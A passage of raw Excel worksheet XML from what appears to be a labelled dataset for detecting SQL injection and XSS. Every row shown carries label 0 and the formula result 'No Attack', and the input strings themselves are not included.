      <c r="B31687">
        <v>0</v>
      </c>
      <c r="C31687" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31688" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31688" s="1" t="s">
        <v>34034</v>
      </c>
      <c r="B31688">
        <v>0</v>
      </c>
      <c r="C31688" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31689" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31689" s="1" t="s">
        <v>20419</v>
      </c>
      <c r="B31689">
        <v>0</v>
      </c>
      <c r="C31689" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31690" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31690" s="1" t="s">
        <v>37093</v>
      </c>
      <c r="B31690">
        <v>0</v>
      </c>
      <c r="C31690" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31691" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31691" s="1" t="s">
        <v>21105</v>
      </c>
      <c r="B31691">
        <v>0</v>
      </c>
      <c r="C31691" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31692" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31692" s="1" t="s">
        <v>27737</v>
      </c>
      <c r="B31692">
        <v>0</v>
      </c>
      <c r="C31692" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31693" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31693" s="1" t="s">
        <v>23897</v>
      </c>
      <c r="B31693">
        <v>0</v>
      </c>
      <c r="C31693" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31694" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31694" s="1" t="s">
        <v>36872</v>
      </c>
      <c r="B31694">
        <v>0</v>
      </c>
      <c r="C31694" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31695" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31695" s="1" t="s">
        <v>28614</v>
      </c>
      <c r="B31695">
        <v>0</v>
      </c>
      <c r="C31695" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31696" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31696" s="1" t="s">
        <v>34190</v>
      </c>
      <c r="B31696">
        <v>0</v>
      </c>
      <c r="C31696" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31697" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31697" s="1" t="s">
        <v>29525</v>
      </c>
      <c r="B31697">
        <v>0</v>
      </c>
      <c r="C31697" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31698" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31698" s="1" t="s">
        <v>33960</v>
      </c>
      <c r="B31698">
        <v>0</v>
      </c>
      <c r="C31698" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31699" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31699" s="1" t="s">
        <v>29595</v>
      </c>
      <c r="B31699">
        <v>0</v>
      </c>
      <c r="C31699" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31700" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31700" s="1" t="s">
        <v>37277</v>
      </c>
      <c r="B31700">
        <v>0</v>
      </c>
      <c r="C31700" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31701" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31701" s="1" t="s">
        <v>37062</v>
      </c>
      <c r="B31701">
        <v>0</v>
      </c>
      <c r="C31701" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31702" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31702" s="1" t="s">
        <v>32456</v>
      </c>
      <c r="B31702">
        <v>0</v>
      </c>
      <c r="C31702" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31703" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31703" s="1" t="s">
        <v>30777</v>
      </c>
      <c r="B31703">
        <v>0</v>
      </c>
      <c r="C31703" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31704" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31704" s="1" t="s">
        <v>21936</v>
      </c>
      <c r="B31704">
        <v>0</v>
      </c>
      <c r="C31704" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31705" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31705" s="1" t="s">
        <v>36156</v>
      </c>
      <c r="B31705">
        <v>0</v>
      </c>
      <c r="C31705" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31706" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31706" s="1" t="s">
        <v>28869</v>
      </c>
      <c r="B31706">
        <v>0</v>
      </c>
      <c r="C31706" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31707" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31707" s="1" t="s">
        <v>35288</v>
      </c>
      <c r="B31707">
        <v>0</v>
      </c>
      <c r="C31707" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31708" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31708" s="1" t="s">
        <v>31065</v>
      </c>
      <c r="B31708">
        <v>0</v>
      </c>
      <c r="C31708" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31709" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31709" s="1" t="s">
        <v>34593</v>
      </c>
      <c r="B31709">
        <v>0</v>
      </c>
      <c r="C31709" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31710" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31710" s="1" t="s">
        <v>24275</v>
      </c>
      <c r="B31710">
        <v>0</v>
      </c>
      <c r="C31710" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31711" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31711" s="1" t="s">
        <v>21200</v>
      </c>
      <c r="B31711">
        <v>0</v>
      </c>
      <c r="C31711" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31712" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31712" s="1" t="s">
        <v>32447</v>
      </c>
      <c r="B31712">
        <v>0</v>
      </c>
      <c r="C31712" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31713" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31713" s="1" t="s">
        <v>24039</v>
      </c>
      <c r="B31713">
        <v>0</v>
      </c>
      <c r="C31713" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31714" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31714" s="1" t="s">
        <v>21494</v>
      </c>
      <c r="B31714">
        <v>0</v>
      </c>
      <c r="C31714" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31715" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31715" s="1" t="s">
        <v>20552</v>
      </c>
      <c r="B31715">
        <v>0</v>
      </c>
      <c r="C31715" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31716" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31716" s="1" t="s">
        <v>31208</v>
      </c>
      <c r="B31716">
        <v>0</v>
      </c>
      <c r="C31716" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31717" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31717" s="1" t="s">
        <v>32525</v>
      </c>
      <c r="B31717">
        <v>0</v>
      </c>
      <c r="C31717" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31718" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31718" s="1" t="s">
        <v>28621</v>
      </c>
      <c r="B31718">
        <v>0</v>
      </c>
      <c r="C31718" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31719" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31719" s="1" t="s">
        <v>20457</v>
      </c>
      <c r="B31719">
        <v>0</v>
      </c>
      <c r="C31719" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31720" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31720" s="1" t="s">
        <v>23393</v>
      </c>
      <c r="B31720">
        <v>0</v>
      </c>
      <c r="C31720" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31721" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31721" s="1" t="s">
        <v>28911</v>
      </c>
      <c r="B31721">
        <v>0</v>
      </c>
      <c r="C31721" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31722" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31722" s="1" t="s">
        <v>32569</v>
      </c>
      <c r="B31722">
        <v>0</v>
      </c>
      <c r="C31722" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31723" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31723" s="1" t="s">
        <v>27682</v>
      </c>
      <c r="B31723">
        <v>0</v>
      </c>
      <c r="C31723" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31724" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31724" s="1" t="s">
        <v>23282</v>
      </c>
      <c r="B31724">
        <v>0</v>
      </c>
      <c r="C31724" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31725" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31725" s="1" t="s">
        <v>29962</v>
      </c>
      <c r="B31725">
        <v>0</v>
      </c>
      <c r="C31725" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31726" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31726" s="1" t="s">
        <v>27025</v>
      </c>
      <c r="B31726">
        <v>0</v>
      </c>
      <c r="C31726" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31727" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31727" s="1" t="s">
        <v>32876</v>
      </c>
      <c r="B31727">
        <v>0</v>
      </c>
      <c r="C31727" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31728" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31728" s="1" t="s">
        <v>33446</v>
      </c>
      <c r="B31728">
        <v>0</v>
      </c>
      <c r="C31728" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31729" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31729" s="1" t="s">
        <v>22155</v>
      </c>
      <c r="B31729">
        <v>0</v>
      </c>
      <c r="C31729" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31730" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31730" s="1" t="s">
        <v>35308</v>
      </c>
      <c r="B31730">
        <v>0</v>
      </c>
      <c r="C31730" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31731" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31731" s="1" t="s">
        <v>26902</v>
      </c>
      <c r="B31731">
        <v>0</v>
      </c>
      <c r="C31731" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31732" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31732" s="1" t="s">
        <v>31963</v>
      </c>
      <c r="B31732">
        <v>0</v>
      </c>
      <c r="C31732" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31733" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31733" s="1" t="s">
        <v>31183</v>
      </c>
      <c r="B31733">
        <v>0</v>
      </c>
      <c r="C31733" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31734" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31734" s="1" t="s">
        <v>34915</v>
      </c>
      <c r="B31734">
        <v>0</v>
      </c>
      <c r="C31734" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31735" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31735" s="1" t="s">
        <v>37136</v>
      </c>
      <c r="B31735">
        <v>0</v>
      </c>
      <c r="C31735" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31736" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31736" s="1" t="s">
        <v>33710</v>
      </c>
      <c r="B31736">
        <v>0</v>
      </c>
      <c r="C31736" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31737" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31737" s="1" t="s">
        <v>20193</v>
      </c>
      <c r="B31737">
        <v>0</v>
      </c>
      <c r="C31737" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31738" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31738" s="1" t="s">
        <v>30994</v>
      </c>
      <c r="B31738">
        <v>0</v>
      </c>
      <c r="C31738" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31739" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31739" s="1" t="s">
        <v>21280</v>
      </c>
      <c r="B31739">
        <v>0</v>
      </c>
      <c r="C31739" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31740" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31740" s="1" t="s">
        <v>28101</v>
      </c>
      <c r="B31740">
        <v>0</v>
      </c>
      <c r="C31740" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31741" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31741" s="1" t="s">
        <v>34077</v>
      </c>
      <c r="B31741">
        <v>0</v>
      </c>
      <c r="C31741" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31742" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31742" s="1" t="s">
        <v>22645</v>
      </c>
      <c r="B31742">
        <v>0</v>
      </c>
      <c r="C31742" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31743" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31743" s="1" t="s">
        <v>31130</v>
      </c>
      <c r="B31743">
        <v>0</v>
      </c>
      <c r="C31743" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31744" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31744" s="1" t="s">
        <v>29820</v>
      </c>
      <c r="B31744">
        <v>0</v>
      </c>
      <c r="C31744" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31745" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31745" s="1" t="s">
        <v>36803</v>
      </c>
      <c r="B31745">
        <v>0</v>
      </c>
      <c r="C31745" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31746" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31746" s="1" t="s">
        <v>36643</v>
      </c>
      <c r="B31746">
        <v>0</v>
      </c>
      <c r="C31746" s="7" t="str">
        <f t="shared" si="495"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31747" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31747" s="1" t="s">
        <v>27596</v>
      </c>
      <c r="B31747">
        <v>0</v>
      </c>
      <c r="C31747" s="7" t="str">
        <f t="shared" ref="C31747:C31810" si="496">IF(B31747=0,"No Attack", IF(B31747=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31748" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31748" s="1" t="s">
        <v>36047</v>
      </c>
      <c r="B31748">
        <v>0</v>
      </c>
      <c r="C31748" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31749" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31749" s="1" t="s">
        <v>24044</v>
      </c>
      <c r="B31749">
        <v>0</v>
      </c>
      <c r="C31749" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31750" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31750" s="1" t="s">
        <v>22595</v>
      </c>
      <c r="B31750">
        <v>0</v>
      </c>
      <c r="C31750" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31751" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31751" s="1" t="s">
        <v>34229</v>
      </c>
      <c r="B31751">
        <v>0</v>
      </c>
      <c r="C31751" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31752" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31752" s="1" t="s">
        <v>34919</v>
      </c>
      <c r="B31752">
        <v>0</v>
      </c>
      <c r="C31752" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31753" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31753" s="1" t="s">
        <v>33653</v>
      </c>
      <c r="B31753">
        <v>0</v>
      </c>
      <c r="C31753" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31754" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31754" s="1" t="s">
        <v>30614</v>
      </c>
      <c r="B31754">
        <v>0</v>
      </c>
      <c r="C31754" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31755" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31755" s="1" t="s">
        <v>32564</v>
      </c>
      <c r="B31755">
        <v>0</v>
      </c>
      <c r="C31755" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31756" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31756" s="1" t="s">
        <v>33395</v>
      </c>
      <c r="B31756">
        <v>0</v>
      </c>
      <c r="C31756" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31757" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31757" s="1" t="s">
        <v>33913</v>
      </c>
      <c r="B31757">
        <v>0</v>
      </c>
      <c r="C31757" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31758" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31758" s="1" t="s">
        <v>30716</v>
      </c>
      <c r="B31758">
        <v>0</v>
      </c>
      <c r="C31758" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31759" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31759" s="1" t="s">
        <v>36865</v>
      </c>
      <c r="B31759">
        <v>0</v>
      </c>
      <c r="C31759" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31760" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31760" s="1" t="s">
        <v>28188</v>
      </c>
      <c r="B31760">
        <v>0</v>
      </c>
      <c r="C31760" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31761" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31761" s="1" t="s">
        <v>28451</v>
      </c>
      <c r="B31761">
        <v>0</v>
      </c>
      <c r="C31761" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31762" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31762" s="1" t="s">
        <v>32387</v>
      </c>
      <c r="B31762">
        <v>0</v>
      </c>
      <c r="C31762" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31763" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31763" s="1" t="s">
        <v>35201</v>
      </c>
      <c r="B31763">
        <v>0</v>
      </c>
      <c r="C31763" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31764" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31764" s="1" t="s">
        <v>28704</v>
      </c>
      <c r="B31764">
        <v>0</v>
      </c>
      <c r="C31764" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31765" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31765" s="1" t="s">
        <v>22605</v>
      </c>
      <c r="B31765">
        <v>0</v>
      </c>
      <c r="C31765" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31766" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31766" s="1" t="s">
        <v>23175</v>
      </c>
      <c r="B31766">
        <v>0</v>
      </c>
      <c r="C31766" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31767" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31767" s="1" t="s">
        <v>30840</v>
      </c>
      <c r="B31767">
        <v>0</v>
      </c>
      <c r="C31767" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31768" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31768" s="1" t="s">
        <v>37486</v>
      </c>
      <c r="B31768">
        <v>0</v>
      </c>
      <c r="C31768" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31769" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31769" s="1" t="s">
        <v>31028</v>
      </c>
      <c r="B31769">
        <v>0</v>
      </c>
      <c r="C31769" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31770" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31770" s="1" t="s">
        <v>33035</v>
      </c>
      <c r="B31770">
        <v>0</v>
      </c>
      <c r="C31770" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31771" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31771" s="1" t="s">
        <v>23368</v>
      </c>
      <c r="B31771">
        <v>0</v>
      </c>
      <c r="C31771" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31772" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31772" s="1" t="s">
        <v>29034</v>
      </c>
      <c r="B31772">
        <v>0</v>
      </c>
      <c r="C31772" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31773" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31773" s="1" t="s">
        <v>36927</v>
      </c>
      <c r="B31773">
        <v>0</v>
      </c>
      <c r="C31773" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31774" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31774" s="1" t="s">
        <v>34830</v>
      </c>
      <c r="B31774">
        <v>0</v>
      </c>
      <c r="C31774" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31775" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31775" s="1" t="s">
        <v>34749</v>
      </c>
      <c r="B31775">
        <v>0</v>
      </c>
      <c r="C31775" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31776" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31776" s="1" t="s">
        <v>31846</v>
      </c>
      <c r="B31776">
        <v>0</v>
      </c>
      <c r="C31776" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31777" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31777" s="1" t="s">
        <v>30561</v>
      </c>
      <c r="B31777">
        <v>0</v>
      </c>
      <c r="C31777" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31778" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31778" s="1" t="s">
        <v>27331</v>
      </c>
      <c r="B31778">
        <v>0</v>
      </c>
      <c r="C31778" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31779" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31779" s="1" t="s">
        <v>29052</v>
      </c>
      <c r="B31779">
        <v>0</v>
      </c>
      <c r="C31779" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31780" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31780" s="1" t="s">
        <v>22231</v>
      </c>
      <c r="B31780">
        <v>0</v>
      </c>
      <c r="C31780" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31781" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31781" s="1" t="s">
        <v>35873</v>
      </c>
      <c r="B31781">
        <v>0</v>
      </c>
      <c r="C31781" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31782" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31782" s="1" t="s">
        <v>24100</v>
      </c>
      <c r="B31782">
        <v>0</v>
      </c>
      <c r="C31782" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31783" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31783" s="1" t="s">
        <v>34282</v>
      </c>
      <c r="B31783">
        <v>0</v>
      </c>
      <c r="C31783" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31784" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31784" s="1" t="s">
        <v>23809</v>
      </c>
      <c r="B31784">
        <v>0</v>
      </c>
      <c r="C31784" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31785" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31785" s="1" t="s">
        <v>32485</v>
      </c>
      <c r="B31785">
        <v>0</v>
      </c>
      <c r="C31785" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31786" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31786" s="1" t="s">
        <v>23351</v>
      </c>
      <c r="B31786">
        <v>0</v>
      </c>
      <c r="C31786" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31787" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31787" s="1" t="s">
        <v>31280</v>
      </c>
      <c r="B31787">
        <v>0</v>
      </c>
      <c r="C31787" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31788" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31788" s="1" t="s">
        <v>28243</v>
      </c>
      <c r="B31788">
        <v>0</v>
      </c>
      <c r="C31788" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31789" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31789" s="1" t="s">
        <v>28404</v>
      </c>
      <c r="B31789">
        <v>0</v>
      </c>
      <c r="C31789" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31790" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31790" s="1" t="s">
        <v>31491</v>
      </c>
      <c r="B31790">
        <v>0</v>
      </c>
      <c r="C31790" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="31791" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31791" s="1" t="s">
        <v>31522</v>
      </c>
      <c r="B31791">
        <v>0</v>
      </c>
      <c r="C31791" s="7" t="str">
        <f t="shared" si="496"/>
        <v>No Attack</v>
      </c>
